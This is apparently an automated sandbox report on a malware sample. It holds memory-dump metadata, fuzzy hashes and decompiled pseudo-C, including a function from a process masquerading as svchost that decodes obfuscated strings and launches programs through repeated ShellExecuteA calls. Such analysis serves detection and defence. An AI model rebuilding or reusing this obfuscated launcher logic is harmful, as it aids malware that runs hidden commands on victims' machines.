ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00408DE7

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: f017a63f5c60780fde6660cf75e957fbfd66fadaaa83c2da79e6f23e7a556107
Instruction ID: 6ad80a62fea04a28af0c39645bd01e0edc1b31655014681f71394f16d0608731
Opcode Fuzzy Hash: f017a63f5c60780fde6660cf75e957fbfd66fadaaa83c2da79e6f23e7a556107
Instruction Fuzzy Hash: 1CE06D706043508BD3309F25E9043427AE5AF14704F408A7EE491D62C2EBB8D448DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040742F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040742F(intOrPtr* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t3;
				intOrPtr* _t12;
				intOrPtr _t13;
				void* _t14;

				_t12 = __ecx;
				 *__ecx = 0x427428;
				_t3 = E0040A85C(__ecx, __edx, _t14, 8);
				_push(1);
				_t13 = _t3;
				 *((intOrPtr*)(_t13 + 4)) = E004093E7(__ecx, _t13, _t14);
				 *((intOrPtr*)(_t12 + 0x34)) = _t13;
				E004073EB(_t12);
				return _t12;
			}

0x00407431
0x00407435
0x0040743b
0x00407440
0x00407442
0x0040744b
0x00407450
0x00407453
0x0040745c

APIs

new.LIBCMT ref: 0040743B
std::locale::_Init.LIBCPMT ref: 00407444

Part of subcall function 004093E7: __EH_prolog3.LIBCMT ref: 004093EE
Part of subcall function 004093E7: std::_Lockit::_Lockit.LIBCPMT ref: 004093F9
Part of subcall function 004093E7: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0040940C
Part of subcall function 004093E7: std::locale::_Setgloballocale.LIBCPMT ref: 00409414
Part of subcall function 004093E7: _Yarn.LIBCPMT ref: 0040942A
Part of subcall function 004093E7: std::_Lockit::~_Lockit.LIBCPMT ref: 00409468

Strings

(tB, xrefs: 00407430

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::locale::_$Lockitstd::_$H_prolog3InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
String ID: (tB
API String ID: 2548088810-446583300
Opcode ID: be8a30c5f14a4c7fd496bcaba320f69b154f034d6570f7dd5af8b2fe8a279454
Instruction ID: 63e95f9f2509783f0a80bf11a3964ffa7c00581c2877d8c4dc0985b2472e8b7a
Opcode Fuzzy Hash: be8a30c5f14a4c7fd496bcaba320f69b154f034d6570f7dd5af8b2fe8a279454
Instruction Fuzzy Hash: D2D05E72B097111AD2443B2A744264DABD5AFC0724B14403FFA05EB6C2DFB9A8128B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBA0, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBA0(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E004105E8(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00413C2D())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00413C2D())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E0041B8FF(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00413C2D())) = 0x16;
					return E00413708() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x0041bba0
0x0041bba9
0x0041bbae
0x0041bbb1
0x0041bbb5
0x0041bbc4
0x0041bbc7
0x0041bbe7
0x0041bbec
0x0041bbef
0x0041bbf1
0x0041bcbf
0x0041bcc5
0x0041bcda
0x0041bce6
0x0041bcec
0x0041bcee
0x0041bcfd
0x0041bcfd
0x0041bcfd
0x0041bd00
0x0041bd00
0x0041bd04
0x0041bd06
0x0041bd09
0x0041bd09
0x0041bd09
0x0041bd09
0x00000000
0x0041bd10
0x0041bcf5
0x00000000
0x0041bcf5
0x0041bcc7
0x0041bcca
0x0041bcca
0x0041bccd
0x0041bccd
0x0041bccf
0x0041bcd0
0x0041bcd0
0x0041bcd4
0x00000000
0x0041bcd4
0x0041bbf7
0x0041bbfd
0x0041bc2a
0x0041bc36
0x0041bc3c
0x0041bc3e
0x00000000
0x00000000
0x0041bc44
0x0041bc4a
0x0041bc4d
0x0041bca9
0x0041bcae
0x0041bcb6
0x00000000
0x0041bcb6
0x0041bc4f
0x0041bc52
0x0041bc54
0x0041bc57
0x0041bc59
0x0041bc5b
0x0041bc91
0x0041bc9f
0x0041bca5
0x0041bca7
0x0041bcbb
0x00000000
0x0041bcbb
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bc5d
0x0041bc5d
0x0041bc5d
0x0041bc60
0x0041bc63
0x0041bc65
0x00000000
0x00000000
0x0041bc6f
0x0041bc76
0x0041bc79
0x0041bc7b
0x0041bc83
0x0041bc83
0x0041bc86
0x0041bc87
0x0041bc8a
0x0041bc8c
0x00000000
0x00000000
0x00000000
0x0041bc8c
0x0041bc7d
0x0041bc7e
0x0041bc81
0x00000000
0x00000000
0x00000000
0x0041bc81
0x0041bc8e
0x00000000
0x0041bc8e
0x0041bbff
0x0041bc01
0x00000000
0x00000000
0x0041bc07
0x0041bc0a
0x0041bc0e
0x0041bc11
0x0041bc15
0x00000000
0x00000000
0x0041bc1b
0x0041bc1c
0x0041bc1f
0x0041bc21
0x00000000
0x00000000
0x00000000
0x0041bc23
0x00000000
0x0041bc0a
0x0041bbce
0x00000000
0x0041bbd9
0x0041bbbb
0x0041bbc1
0x00000000
0x0041bbc1
0x0041bd18

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041BC36
GetLastError.KERNEL32 ref: 0041BC44
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041BC9F

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 2f9357a9c9580d9d59686362672994cef03ed0cc065d0218d1ddd46a030aa4f5
Instruction ID: 3a761266ab08d7227f8080508a28d82f0b35dd911cd5074d835ca5eeedabaabe
Opcode Fuzzy Hash: 2f9357a9c9580d9d59686362672994cef03ed0cc065d0218d1ddd46a030aa4f5
Instruction Fuzzy Hash: BB41E531604606AFCB259F65D844BFB7BA4EF05310F24416EF85997391EB348D81C7D9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Izhwsiraoosvchost.exe PID: 3332 Parent PID: 5588 Izhwsiraoosvchost.exeCOMMON

Executed Functions

Function 00E89CBF, Relevance: 37.2, APIs: 5, Strings: 16, Instructions: 467
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00E89CBF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				void _t149;
				void _t150;
				void _t153;
				void _t154;
				void _t157;
				void _t158;
				void _t161;
				void _t162;
				void _t165;
				void _t166;
				void* _t169;
				void _t170;
				void _t171;
				void* _t174;
				void _t175;
				void _t176;
				void* _t179;
				void _t180;
				void _t181;
				void* _t184;
				void _t185;
				void _t186;
				void* _t189;
				void _t190;
				void _t191;
				void _t194;
				void _t195;
				void* _t198;
				void _t199;
				void _t200;
				char* _t202;
				void* _t203;
				char* _t204;
				char* _t208;
				char* _t212;
				char* _t216;
				char* _t220;
				void* _t225;
				signed int _t226;
				char* _t228;
				char _t233;
				char _t235;
				char _t237;
				char _t239;
				char _t241;
				signed int _t243;
				signed int _t249;
				signed int _t255;
				signed int _t261;
				signed int _t267;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t295;
				signed int _t302;
				signed int _t308;
				signed int _t315;
				void* _t333;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t344;
				signed int _t345;
				void* _t346;
				signed int _t347;
				void* _t348;
				signed int _t349;
				void* _t350;
				signed int _t351;
				void* _t352;
				signed int _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				signed int _t357;
				void* _t358;
				signed int _t359;
				void* _t360;
				signed int _t361;
				intOrPtr _t363;
				void* _t365;
				void* _t371;
				void* _t377;
				void* _t383;
				void* _t389;
				void* _t395;
				void* _t401;
				void* _t407;
				void* _t413;
				void* _t418;
				void* _t423;
				void* _t428;
				intOrPtr _t435;
				void* _t436;
				void* _t437;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t451;
				signed int _t452;
				signed int _t454;
				void* _t455;
				void* _t457;
				void* _t459;
				void* _t461;
				void* _t463;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t469;
				void* _t471;
				void* _t473;
				void* _t475;
				void* _t477;
				void* _t478;
				signed int _t479;

				_t134 =  *0xea9014; // 0xa413846
				 *(_t454 + 0x70) = _t134 ^ _t454;
				_t225 =  *(_t454 + 0x7c);
				_push(0x104);
				_t136 = E00E909A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x18)) = _t136;
				_t363 = E00E909A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x28)) = _t363;
				_t138 = E00E909A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x24)) = _t138;
				_t139 = E00E909A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x2c)) = _t139;
				_t435 = E00E909A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x38)) = _t435;
				E00E909A2();
				_t455 = _t454 + 0x18;
				 *((intOrPtr*)(_t455 + 0x28)) = 0x31273235;
				_t9 = _t455 + 0x28; // 0x31273235
				 *((intOrPtr*)(_t455 + 0x2c)) = 0x222b242a;
				 *((char*)(_t455 + 0x30)) = 0;
				_t143 = E00E9187C(E00E89790(_t9));
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				_t451 = _t143;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t144 = E00E827DA(_t455 + 0x34);
				_t333 =  *((intOrPtr*)(_t455 + 0x10)) - _t144;
				do {
					_t233 =  *_t144;
					 *((char*)(_t144 + _t333)) = _t233;
					_t144 = _t144 + 1;
				} while (_t233 != 0);
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t145 = E00E827DA(_t455 + 0x34);
				_t335 = _t363 - _t145;
				do {
					_t235 =  *_t145;
					 *((char*)(_t145 + _t335)) = _t235;
					_t145 = _t145 + 1;
				} while (_t235 != 0);
				_t23 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t146 = E00E827DA(_t23);
				_t337 =  *((intOrPtr*)(_t455 + 0x14)) - _t146;
				do {
					_t237 =  *_t146;
					 *((char*)(_t146 + _t337)) = _t237;
					_t146 = _t146 + 1;
				} while (_t237 != 0);
				_t29 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t147 = E00E827DA(_t29);
				_t339 =  *((intOrPtr*)(_t455 + 0x18)) - _t147;
				do {
					_t239 =  *_t147;
					 *((char*)(_t147 + _t339)) = _t239;
					_t147 = _t147 + 1;
				} while (_t239 != 0);
				_t35 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t148 = E00E827DA(_t35);
				_t341 = _t435 - _t148;
				do {
					_t241 =  *_t148;
					 *((char*)(_t148 + _t341)) = _t241;
					_t148 = _t148 + 1;
				} while (_t241 != 0);
				_t342 = _t225;
				_t436 = _t225;
				do {
					_t149 =  *_t342;
					_t342 = _t342 + 1;
				} while (_t149 != 0);
				_t343 = _t342 - _t436;
				_t365 =  *((intOrPtr*)(_t455 + 0x10)) - 1;
				do {
					_t150 =  *(_t365 + 1);
					_t365 = _t365 + 1;
				} while (_t150 != 0);
				_t243 = _t343 >> 2;
				memcpy(_t365, _t436, _t243 << 2);
				_t344 = _t225;
				memcpy(_t436 + _t243 + _t243, _t436, _t343 & 0x00000003);
				_t457 = _t455 + 0x18;
				_t437 = _t344;
				do {
					_t153 =  *_t344;
					_t344 = _t344 + 1;
				} while (_t153 != 0);
				_t345 = _t344 - _t437;
				_t371 =  *((intOrPtr*)(_t457 + 0x1c)) - 1;
				do {
					_t154 =  *(_t371 + 1);
					_t371 = _t371 + 1;
				} while (_t154 != 0);
				_t249 = _t345 >> 2;
				memcpy(_t371, _t437, _t249 << 2);
				_t346 = _t225;
				memcpy(_t437 + _t249 + _t249, _t437, _t345 & 0x00000003);
				_t459 = _t457 + 0x18;
				_t438 = _t346;
				do {
					_t157 =  *_t346;
					_t346 = _t346 + 1;
				} while (_t157 != 0);
				_t347 = _t346 - _t438;
				_t377 =  *((intOrPtr*)(_t459 + 0x14)) - 1;
				do {
					_t158 =  *(_t377 + 1);
					_t377 = _t377 + 1;
				} while (_t158 != 0);
				_t255 = _t347 >> 2;
				memcpy(_t377, _t438, _t255 << 2);
				_t348 = _t225;
				memcpy(_t438 + _t255 + _t255, _t438, _t347 & 0x00000003);
				_t461 = _t459 + 0x18;
				_t439 = _t348;
				do {
					_t161 =  *_t348;
					_t348 = _t348 + 1;
				} while (_t161 != 0);
				_t349 = _t348 - _t439;
				_t383 =  *((intOrPtr*)(_t461 + 0x18)) - 1;
				do {
					_t162 =  *(_t383 + 1);
					_t383 = _t383 + 1;
				} while (_t162 != 0);
				_t261 = _t349 >> 2;
				memcpy(_t383, _t439, _t261 << 2);
				memcpy(_t439 + _t261 + _t261, _t439, _t349 & 0x00000003);
				_t463 = _t461 + 0x18;
				_t440 = _t225;
				do {
					_t165 =  *_t225;
					_t225 = _t225 + 1;
				} while (_t165 != 0);
				_t226 = _t225 - _t440;
				_t389 =  *((intOrPtr*)(_t463 + 0x20)) - 1;
				do {
					_t166 =  *(_t389 + 1);
					_t389 = _t389 + 1;
				} while (_t166 != 0);
				asm("movaps xmm0, [0xe7dce0]");
				_t267 = _t226 >> 2;
				memcpy(_t389, _t440, _t267 << 2);
				_t464 = _t463 + 0xc;
				asm("movups [esp+0x34], xmm0");
				asm("movaps xmm0, [0xe7de90]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t464 + 0x74)) = 0xafc3d3ac;
				asm("movaps xmm0, [0xe7de50]");
				memcpy(_t440 + _t267 + _t267, _t440, _t226 & 0x00000003);
				_t465 = _t464 + 0xc;
				asm("movups [esp+0x54], xmm0");
				_t56 = _t465 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t465 + 0x78)) = 0xa5afc1d6;
				asm("movaps xmm0, [0xe7de20]");
				asm("movups [esp+0x64], xmm0");
				 *((char*)(_t465 + 0x7c)) = 0;
				_t169 = E00E8A2DD(_t56);
				_t350 = _t169;
				_t441 = _t169;
				do {
					_t170 =  *_t350;
					_t350 = _t350 + 1;
				} while (_t170 != 0);
				_t351 = _t350 - _t441;
				_t395 =  *((intOrPtr*)(_t465 + 0x10)) - 1;
				do {
					_t171 =  *(_t395 + 1);
					_t395 = _t395 + 1;
				} while (_t171 != 0);
				asm("movaps xmm0, [0xe7dce0]");
				_t274 = _t351 >> 2;
				memcpy(_t395, _t441, _t274 << 2);
				memcpy(_t441 + _t274 + _t274, _t441, _t351 & 0x00000003);
				_t467 = _t465 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t62 = _t467 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t467 + 0x54)) = 0x26304d32;
				asm("movaps xmm0, [0xe7deb0]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t467 + 0x58)) = 0x26344925;
				 *((intOrPtr*)(_t467 + 0x5c)) = 0x422e3b44;
				 *((short*)(_t467 + 0x60)) = 0x4e;
				_t174 = E00E8A2F8(_t62);
				_t352 = _t174;
				_t442 = _t174;
				do {
					_t175 =  *_t352;
					_t352 = _t352 + 1;
				} while (_t175 != 0);
				_t353 = _t352 - _t442;
				_t401 =  *((intOrPtr*)(_t467 + 0x1c)) - 1;
				do {
					_t176 =  *(_t401 + 1);
					_t401 = _t401 + 1;
				} while (_t176 != 0);
				asm("movaps xmm0, [0xe7dce0]");
				_t281 = _t353 >> 2;
				memcpy(_t401, _t442, _t281 << 2);
				memcpy(_t442 + _t281 + _t281, _t442, _t353 & 0x00000003);
				_t469 = _t467 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t70 = _t469 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t469 + 0x64)) = 0x5a36235c;
				asm("movaps xmm0, [0xe7dd00]");
				asm("movups [esp+0x44], xmm0");
				 *((short*)(_t469 + 0x68)) = 0x56;
				asm("movaps xmm0, [0xe7dd30]");
				asm("movups [esp+0x54], xmm0");
				_t179 = E00E8A2C2(_t70);
				_t354 = _t179;
				_t443 = _t179;
				do {
					_t180 =  *_t354;
					_t354 = _t354 + 1;
				} while (_t180 != 0);
				_t355 = _t354 - _t443;
				_t407 =  *((intOrPtr*)(_t469 + 0x14)) - 1;
				do {
					_t181 =  *(_t407 + 1);
					_t407 = _t407 + 1;
				} while (_t181 != 0);
				asm("movaps xmm0, [0xe7dce0]");
				_t288 = _t355 >> 2;
				memcpy(_t407, _t443, _t288 << 2);
				memcpy(_t443 + _t288 + _t288, _t443, _t355 & 0x00000003);
				_t471 = _t469 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t76 = _t471 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t471 + 0x54)) = 0x2227334c;
				asm("movaps xmm0, [0xe7db20]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t471 + 0x58)) = 0x4b273748;
				 *((intOrPtr*)(_t471 + 0x5c)) = 0x49432d3a;
				 *((char*)(_t471 + 0x60)) = 0;
				_t184 = E00E8A2A7(_t76);
				_t356 = _t184;
				_t444 = _t184;
				do {
					_t185 =  *_t356;
					_t356 = _t356 + 1;
				} while (_t185 != 0);
				_t357 = _t356 - _t444;
				_t413 =  *((intOrPtr*)(_t471 + 0x18)) - 1;
				do {
					_t186 =  *(_t413 + 1);
					_t413 = _t413 + 1;
				} while (_t186 != 0);
				asm("movaps xmm0, [0xe7dce0]");
				_t295 = _t357 >> 2;
				memcpy(_t413, _t444, _t295 << 2);
				memcpy(_t444 + _t295 + _t295, _t444, _t357 & 0x00000003);
				_t473 = _t471 + 0x18;
				_t84 = _t473 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t473 + 0x44)) = 0x36367e70;
				asm("movups [esp+0x34], xmm0");
				 *((intOrPtr*)(_t473 + 0x48)) = 0x75762c3a;
				 *((char*)(_t473 + 0x4c)) = 0;
				_t189 = E00E82CF5(_t84);
				_t358 = _t189;
				_t445 = _t189;
				do {
					_t190 =  *_t358;
					_t358 = _t358 + 1;
				} while (_t190 != 0);
				_t228 =  *(_t473 + 0x20);
				_t359 = _t358 - _t445;
				_t418 = _t228 - 1;
				do {
					_t191 =  *(_t418 + 1);
					_t418 = _t418 + 1;
				} while (_t191 != 0);
				_t302 = _t359 >> 2;
				memcpy(_t418, _t445, _t302 << 2);
				memcpy(_t445 + _t302 + _t302, _t445, _t359 & 0x00000003);
				_t475 = _t473 + 0x18;
				_t446 = _t451;
				do {
					_t194 =  *_t451;
					_t451 = _t451 + 1;
				} while (_t194 != 0);
				_t452 = _t451 - _t446;
				_t423 = _t228 - 1;
				do {
					_t195 =  *(_t423 + 1);
					_t423 = _t423 + 1;
				} while (_t195 != 0);
				asm("movaps xmm0, [0xe7dad0]");
				_t308 = _t452 >> 2;
				memcpy(_t423, _t446, _t308 << 2);
				memcpy(_t446 + _t308 + _t308, _t446, _t452 & 0x00000003);
				_t477 = _t475 + 0x18;
				_t95 = _t477 + 0x34; // 0x2a62226f
				asm("movups [esp+0x34], xmm0");
				_t198 = E00E82D2B(_t95);
				_t360 = _t198;
				_t447 = _t198;
				do {
					_t199 =  *_t360;
					_t360 = _t360 + 1;
				} while (_t199 != 0);
				_t361 = _t360 - _t447;
				_t428 = _t228 - 1;
				do {
					_t200 =  *(_t428 + 1);
					_t428 = _t428 + 1;
				} while (_t200 != 0);
				 *((intOrPtr*)(_t477 + 0x28)) = 0x6d262c23;
				_t315 = _t361 >> 2;
				_t202 = memcpy(_t428, _t447, _t315 << 2);
				_t478 = _t477 + 0xc;
				 *((intOrPtr*)(_t478 + 0x2c)) = 0x233d21;
				 *((intOrPtr*)(_t478 + 0x24)) = 0x2d27312f;
				_t203 = memcpy(_t447 + _t315 + _t315, _t447, _t361 & 0x00000003);
				_t479 = _t478 + 0xc;
				_t103 = _t479 + 0x34; // 0x2a62226f
				 *(_t479 + 0x30) = _t203;
				_t204 = E00E86346(_t103);
				ShellExecuteA(0, E00E832BE(_t479 + 0x30), _t204,  *(_t478 + 0x18), _t202, _t202); // executed
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				_t107 = _t479 + 0x24; // 0x2d27312f
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t208 = E00E86346(_t479 + 0x34);
				ShellExecuteA(0, E00E832BE(_t479 + 0x30), _t208,  *_t107, 0, 0); // executed
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t212 = E00E86346(_t479 + 0x34);
				ShellExecuteA(0, E00E832BE(_t479 + 0x30), _t212,  *(_t479 + 0x1c), 0, 0); // executed
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t216 = E00E86346(_t479 + 0x34);
				ShellExecuteA(0, E00E832BE(_t479 + 0x30), _t216,  *(_t479 + 0x20), 0, 0); // executed
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t220 = E00E86346(_t479 + 0x34);
				ShellExecuteA(0, E00E832BE(_t479 + 0x30), _t220, _t228, 0, 0); // executed
				return E00E8AE43( *(_t479 + 0x80) ^ _t479);
			}

0x00e89cc2
0x00e89cc9
0x00e89cce
0x00e89cda
0x00e89cdb
0x00e89ce0
0x00e89ce1
0x00e89cea
0x00e89cec
0x00e89ced
0x00e89cf1
0x00e89cf6
0x00e89cf7
0x00e89cfb
0x00e89d00
0x00e89d01
0x00e89d0a
0x00e89d0c
0x00e89d0d
0x00e89d11
0x00e89d16
0x00e89d19
0x00e89d21
0x00e89d25
0x00e89d2d
0x00e89d38
0x00e89d42
0x00e89d4a
0x00e89d4c
0x00e89d54
0x00e89d5c
0x00e89d65
0x00e89d67
0x00e89d67
0x00e89d69
0x00e89d6c
0x00e89d6d
0x00e89d75
0x00e89d7d
0x00e89d85
0x00e89d8d
0x00e89d94
0x00e89d96
0x00e89d96
0x00e89d98
0x00e89d9b
0x00e89d9c
0x00e89da0
0x00e89da4
0x00e89dac
0x00e89db4
0x00e89dbc
0x00e89dc5
0x00e89dc7
0x00e89dc7
0x00e89dc9
0x00e89dcc
0x00e89dcd
0x00e89dd1
0x00e89dd5
0x00e89ddd
0x00e89de5
0x00e89ded
0x00e89df6
0x00e89df8
0x00e89df8
0x00e89dfa
0x00e89dfd
0x00e89dfe
0x00e89e02
0x00e89e06
0x00e89e0e
0x00e89e16
0x00e89e1e
0x00e89e25
0x00e89e27
0x00e89e27
0x00e89e29
0x00e89e2c
0x00e89e2d
0x00e89e31
0x00e89e33
0x00e89e35
0x00e89e35
0x00e89e37
0x00e89e38
0x00e89e40
0x00e89e42
0x00e89e43
0x00e89e43
0x00e89e46
0x00e89e47
0x00e89e4d
0x00e89e50
0x00e89e54
0x00e89e59
0x00e89e59
0x00e89e5b
0x00e89e5d
0x00e89e5d
0x00e89e5f
0x00e89e60
0x00e89e68
0x00e89e6a
0x00e89e6b
0x00e89e6b
0x00e89e6e
0x00e89e6f
0x00e89e75
0x00e89e78
0x00e89e7c
0x00e89e81
0x00e89e81
0x00e89e83
0x00e89e85
0x00e89e85
0x00e89e87
0x00e89e88
0x00e89e90
0x00e89e92
0x00e89e93
0x00e89e93
0x00e89e96
0x00e89e97
0x00e89e9d
0x00e89ea0
0x00e89ea4
0x00e89ea9
0x00e89ea9
0x00e89eab
0x00e89ead
0x00e89ead
0x00e89eaf
0x00e89eb0
0x00e89eb8
0x00e89eba
0x00e89ebb
0x00e89ebb
0x00e89ebe
0x00e89ebf
0x00e89ec5
0x00e89ec8
0x00e89ecf
0x00e89ecf
0x00e89ed1
0x00e89ed3
0x00e89ed3
0x00e89ed5
0x00e89ed6
0x00e89ede
0x00e89ee0
0x00e89ee1
0x00e89ee1
0x00e89ee4
0x00e89ee5
0x00e89ee9
0x00e89ef2
0x00e89ef5
